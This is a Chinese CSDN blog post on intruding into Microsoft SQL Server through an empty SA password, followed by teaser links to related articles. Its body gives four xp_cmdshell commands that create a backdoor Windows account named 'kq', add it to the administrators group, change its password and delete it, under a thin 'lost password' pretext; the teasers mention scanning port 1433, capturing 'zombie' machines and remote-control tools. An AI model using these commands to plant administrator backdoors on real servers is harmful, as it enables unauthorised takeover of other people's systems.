MSSQL SA 空口令 入侵漏洞

最新推荐文章于 2024-06-17 15:16:35 发布
最新推荐文章于 2024-06-17 15:16:35 发布
阅读量1.3k 收藏
点赞数
文章标签: 数据库服务器 user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/skywebnet/article/details/425344
版权

解决问题: 客户数据库服务器,因遗失密码 而无法进入时,可考虑通过该方法进行入侵.

1.添加用户 kq 密码 123 为后门.
EXEC master..xp_cmdshell 'net user  kq 123 /add'

2.将用户 kq 添加到系统管理员组中.
EXEC master..xp_cmdshell 'net localgroup administrators  kq  /add'

3.删除用户 kq
EXEC master..xp_cmdshell 'net user kq /delete'

4.修改用户密码(123456)
EXEC master..xp_cmdshell 'net user kq  123456'

skywebnet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[sql server] Microsoft SQL Server SA口令攻防实战
永生天地
07-04 5499
【51CTO.com 独家特稿】Microsoft SQLServer是一个c/s模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。我们都知道,在网络中Microsoft SQLServer的入侵最常见的就是利用SA口令入侵了,而核心内容就是利用Microsoft SQLServer中的存储过程获得系统管理员权限,那到底什么是存储过程?为什么利用它可以获得系统管理员权限?存储过程是存储在SQLServer中的预先写好的SQL语句集合,它
Microsoft SQL Server SA口令攻防实战
eldn__的专栏
12-03 5495
摘要:我们都知道,在网络中Microsoft SQLServer的入侵最常见的就是利用SA口令入侵了,而核心内容就是利用Microsoft SQLServer中的存储过程获得系统管理员权限,那到底什么是存储过程?为什么利用它可以获得系统管理员权限?标签:SA口令  攻防  SQL Server  Microsoft 【51CTO.com 独家特稿】Microsoft SQLSer
SQL注入漏洞引起的内网渗透 | 实战
最新发布
Python84310366的博客
06-17 725
近期一直再学习内网渗透,实验什么的都是玩玩靶机。这一天朋友说有个站点有漏洞,就发过来看了一些是一个SQL注入,继而开启了这次内网渗透。水平有限,并且初学哈哈哈哈!没有什么技术要点纯属误打误撞,如果有什么错误的地方希望大佬多多指点!
最新microsoft sql server sa权限入侵方法
11-08
最新microsoft sql server sa权限入侵方法
快速抓肉机(sa口令篇)(转)
08-17 493
快速抓肉机(sa口令篇)(转)[@more@]快速抓肉机(sa口令篇)不要以为这个世界没有sa口令的机器了,或许作为一个服务器的很少,但是现在很多软件都是使用sql数据库的,而软件的设计者(公司)一般都设置sql密码是口...
SA口令
congaishang0622的博客
09-09 349
登录系统管理提示输入SQL Server口令 分析SA口令问题 SA口令口令比较简单很可能会被病毒或木马功击,建议用户设置SA密码,操作步骤:系统管理àAdmin身份登录à系...
利用mssql口令的注入以及防御(安全)
全欣 的专栏
03-24 4692
原文地址:http://www.hackmvp.com/donghua/sort0114/16287.html 第一部分:猜解口令入侵  大家都知道1433是mssql数据库的默认端口,也都知道sa是mssql数据库的默认的管理员帐号,这个端口的入侵以前讲过许多,网上也有很多这方面的资料,下面我就根据我个人在【新世纪网安】的学习来总结一下    首先,要想通过1433端口进入载有ms
SA口令入侵到3389终结完整编
chinawwc的专栏
05-15 4261
工具:WINNTAutoAttack自动攻击器(扫漏洞)SQLTOOLS(SA口令连接器)RAMDIN影子3.0中文版(远程控制程序)RADMIN注册码:08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23SC.e
如何恢复MYSQL的ROOT口令
09-11
当您不小心忘记MySQL的ROOT口令时,可能会导致无法访问数据库系统。不用担心,恢复MySQL的ROOT口令是一个相对简单的过程,只需遵循几个步骤即可。以下是详细的操作指南: 1. **关闭MySQL服务** 在恢复ROOT口令的第...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
mysql5 注入漏洞
10-30
MySQL5注入漏洞是一种常见的安全问题,它发生在应用程序与数据库交互时,由于不恰当的数据过滤或错误的查询构造,使得攻击者能够向SQL语句中插入恶意代码,从而获取、修改、删除数据库中的敏感信息,甚至控制整个...
mssql口令扫描工具+字典
01-19
mssql口令扫描工具+字典。
最新MySQL数据库漏洞情况通报
12-15
近期,一个严重的安全漏洞(CNNVD-201609-183,CVE-2016-6662)被公开,涉及MySQL的多个版本,包括MySQL 5.7.15及其以前的版本、5.6.33及其以前的版本以及5.5.52及其以前的版本。这个漏洞主要存在于MySQL的配置文件...
3306MYSQL口令测试工具
09-11
3306MYSQL口令测试工具
MSSQL SA口令***那些事
weixin_34293902的博客
07-04 473
本文技术交流与学习之用,请勿非法使用,产生任何后果本人概不负责。一、如何找到SA口令计算机1、扫描获得1433端口开放的计算机 端口扫描器和专门的SQL扫描器很多,笔者经过大量的测试,推荐使用ssport(如图1)这款扫描器进行扫描,尽管有些基于SYN方式的扫描器扫描速度很快,但误报和漏扫情况比较多,而且对网络速度要求比较高,而ssport可以根据扫描计算机的硬件...
MSSQL sa口令提权基础知识学习
wjy397的专栏
06-29 3016
https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 网络安全中经常利用SqlServer SA
sql口令入侵
飞雨飞羽飞鱼
08-12 5048
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <div id="content" class= "content mod-cs-content text-content clearfix"> sql口令入侵
遇上mysql root 密码为和frontpage extention漏洞(原创)
liswa 电脑备忘录
12-05 1391
以前只在网上看到过介绍,想不到无意中被我碰上了。事因我很少使用扫描的,所以遇到的漏洞不多。这次刚好心血来潮扫了一个C段,就被我碰上了。是windows主机,但是安装了mysql,X-Scan报告了一些信息,其中有两个引起了我的注意。一种是mysql的root密码为,一种是frontpage的extention漏洞。1、对于mysql中root密码为:         使用mysql的连接器连接
SA口令带来的安全隐患
weixin_34413802的博客
03-21 291
文章出自www.51cto.com 存在Microsoft SQL Server SA口令漏洞的计算机一直是网络***者青睐的对象之一,通过这个漏洞,可以轻易的得到服务器的管理权限,从而威胁网络及数据的安全。作为网络管理员,我 们可不能不闻不问,一定要弄清楚这其中的起因、经过和结果,才能有的放矢,做到更为有效的防范,下面我就详细的向大家介绍一下。 Microsoft ...
mysql避免弱口令
07-28
为了避免MySQL数据库的弱口令,可以采取以下措施: 1. 使用强密码:确保密码长度足够长,包含大小写字母、数字和特殊字符,并且定期更换密码。 2. 限制远程访问:尽量限制MySQL数据库只允许本地访问,避免暴露在公网中,如果需要远程访问,则应该限制仅允许特定IP地址或IP段进行访问。 3. 禁用不必要的账户:禁用或删除不必要的MySQL账户,只保留必要的账户,并且为每个账户分配合适的权限。 4. 使用防火墙:通过防火墙规则限制MySQL服务器的访问,只允许指定的IP地址或IP段进行连接。 5. 使用SSL/TLS加密:启用SSL/TLS加密来保护MySQL数据库的通信,防止数据泄露和中间人攻击。 6. 定期更新和维护:及时安装MySQL官方发布的安全补丁,保持数据库软件的最新版本,并且进行定期的安全审计和漏洞扫描。 7. 日志监控和报警:开启MySQL的日志功能,及时监控和分析日志内容,发现异常活动并及时采取相应措施。 综合以上措施可以有效提高MySQL数据库的安全性,避免弱口令导致的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值